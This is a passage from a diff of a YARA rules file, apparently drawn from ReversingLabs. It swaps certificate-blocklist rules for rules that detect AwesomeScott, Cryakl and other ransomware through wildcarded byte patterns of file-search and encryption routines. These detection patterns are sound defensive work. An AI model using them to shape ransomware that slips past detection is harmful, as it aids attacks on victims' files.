+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ?? 99 83 C4 ?? 0B
+            C2 75 ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 83 CB ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? 8B CF 8D A4 24
+            ?? ?? ?? ?? 66 8B 31 66 3B 32 75 ?? 66 85 F6 74 ?? 66 8B 41 ?? 66 3B 42 ?? 75 ?? 83
+        }
+		$find_files_p3 = {
+            C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9
+            ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50
+            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85
+            C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ??
+            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
+            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ??
+            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 0F 66 3B 08 75 ?? 66 85 C9 74 ?? 66 8B 4F ?? 66 3B 48
+            ?? 75 ?? 83 C7 ?? 83 C0 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 85 DB 7F ?? 8B 95 ?? ?? ?? ?? 7C ?? 81
+        }
+		$find_files_p4 = {
+            FA ?? ?? ?? ?? 73 ?? 3B D8 0F 8F ?? ?? ?? ?? 7C ?? 3B D1 73 ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 EC ?? 8D 95 ?? ?? ?? ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 84 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 3B D8 7F
+            ?? 7C ?? 8B 85 ?? ?? ?? ?? 3B C1 73 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 3D ??
+            ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ??
+            ?? 85 C0 8B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D
+            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8B F1 C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 74 ?? 83 C8 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 56 8D 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 0F 57
+            C0 68 ?? ?? ?? ?? 50 F3 0F 7F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
+            ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
+            57 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B FF
+            81 FF ?? ?? ?? ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
+            50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75
+            ?? 8B C7 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 BE ?? ?? ?? ?? 2B F0 8D 85 ?? ?? ?? ??
+            56 03 C7 56 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F7 8D 85 ?? ??
+            ?? ?? 56 50 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 6A ?? 50 E8 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ??
+            83 C4 ?? 33 CD 33 C0 5F 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VELES PROPERTIES LIMITED" and ( pe.signatures [ i ] . serial == "00:ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba" or pe.signatures [ i ] . serial == "ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba" ) and 1578566034 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Awesomescott : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AwesomeScott ransomware."
 		author = "ReversingLabs"
-		id = "f0050a52-65d5-54b2-b06d-08812af98948"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "36d3b801-dbdb-585a-ac80-1827a6749c87"
+		date = "2020-09-16"
+		modified = "2020-09-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6732-L6750"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "230d33f0d1d31d4cb76bf3b13f109d3cc9ace846daef145e1dc7666b33c8a42a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.AwesomeScott.yara#L1-L101"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ed8096a4abbd015f79f4ec7239cd4070194ad70fa03da6714e499a41f9fb9423"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "AwesomeScott"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pivo ZLoun s.r.o." and ( pe.signatures [ i ] . serial == "00:fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" or pe.signatures [ i ] . serial == "fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" ) and 1604019600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_7C061Baa3118327255161F6A7Fa4E21D : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "f597956a-d11b-54e4-91b6-0572c0b10279"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6752-L6770"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4193fce69af03b3521a3cc442b762c52f8585b44fa6b0bd78b9ace171b807ed4"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 57 41 54 41 55 41 56 41 57 48 83 EC ??
+            45 33 FF 4C 8B F2 49 8B D8 4C 89 78 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 4C
+            89 78 ?? 4C 89 78 ?? 4C 89 78 ?? 4C 89 78 ?? B8 ?? ?? ?? ?? 48 8B F1 45 33 C9 44 8B
+            C0 8B D0 49 8B CE 45 32 ED 48 83 CD ?? 49 8B FF FF 15 ?? ?? ?? ?? 4C 8B E0 48 3B C5
+            75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8B CB 41 8D 51 ?? 45 8D 41 ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B E8 48 83 F8 ?? 75
+            ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 44 8B CB
+      }
+		$encrypt_files_p2 = {
+            44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ??
+            4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 44 8B CB 33 D2 C7 44 24 ?? ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C
+            24 ?? 48 8D 44 24 ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 89 44 24 ?? FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 0D ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 44 8B C0 45 33 C9 FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B
+            44 24 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 41 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 44 24
+            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 41 B8 ?? ?? ?? ?? 48 8D 15
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 DB 90 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 49 8B
+            CC 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ??
+            48 8B 4C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F B6 DB 0F 42 D8 48 8D 44 24
+            ?? 45 33 C9 48 89 44 24 ?? 44 0F B6 C3 33 D2 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0
+      }
+		$encrypt_files_p3 = {
+            74 ?? 44 8B 44 24 ?? 4C 8D 4C 24 ?? 48 8B D7 48 8B CD 4C 89 7C 24 ?? FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 84 DB 0F 84 ?? ?? ?? ?? 41 B5 ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D
+            15 ?? ?? ?? ?? 44 8B C0 48 8B CE E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 49 8B CC FF 15 ?? ??
+            ?? ?? 48 85 ED 74 ?? 48 8B CD FF 15 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF E8 ?? ?? ??
+            ?? 48 8B 4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B
+            D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
+            8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 8B
+            4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ??
+            ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ??
+            ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 48 8B 4C 24
+        }
+		$find_files = {
+            E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 F6 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ??
+            ?? 00 00 E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15
+            ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83
+            F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 4C 8D 44
+            24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D
+            15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
+            ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
+            8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C
+            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
+            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 48 8D
+            8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48
+            8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ??
+            4C 8D 44 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 4C 8D 84 24 ?? ??
+            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 39 74 24 ?? 76
+            ?? 4C 8D 0D ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24
+            ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            48 8B CB FF 15
+      }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YUTAKS, OOO" and ( pe.signatures [ i ] . serial == "00:7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d" or pe.signatures [ i ] . serial == "7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d" ) and 1599611338 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_files and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_04332C16724Ffeda5868D22Af56Aea43 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryakl : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Cryakl ransomware."
 		author = "ReversingLabs"
-		id = "1e5a2708-2875-50ab-af6b-3be91f38e13f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "5c668278-458e-5b13-83c4-63beab5249ed"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6772-L6788"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6b62d5c7a3c6e3096797cd2f515d86045fa77682638bda44175d05c5b6c5bbc0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Cryakl.yara#L1-L64"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "51d50ab1ce021e2facbca3a35af372186287a8d69b66651c9804234a409d9932"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cryakl"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bespoke Software Solutions Limited" and pe.signatures [ i ] . serial == "04:33:2c:16:72:4f:fe:da:58:68:d2:2a:f5:6a:ea:43" and 1597971601 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_030012F134E64347669F3256C7D050C5 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "1e61a781-d5fb-5f05-81c4-3cc697ece13c"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6790-L6806"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1a55856bfa4c632b2b0404686dc7ba5e7238b619dd4d2eb68c3d291bc86e52c4"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$enum_and_encrypt_files_1 = {
+            8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
+            30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ??
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 83 E0 ?? 83 F8 ?? 75 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 92 ?? ?? ?? ??
+            84 C0 0F 84 ?? ?? ?? ?? FF 75 ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+        }
+		$enum_and_encrypt_files_2 = {
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ??
+            ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??
+            C6 45 ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 52 ?? 8B D8
+            4B 85 DB 0F 8C ?? ?? ?? ?? 43 33 F6 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 8D ??
+            ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B D6 8B 38 FF 57 ?? 8B
+            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
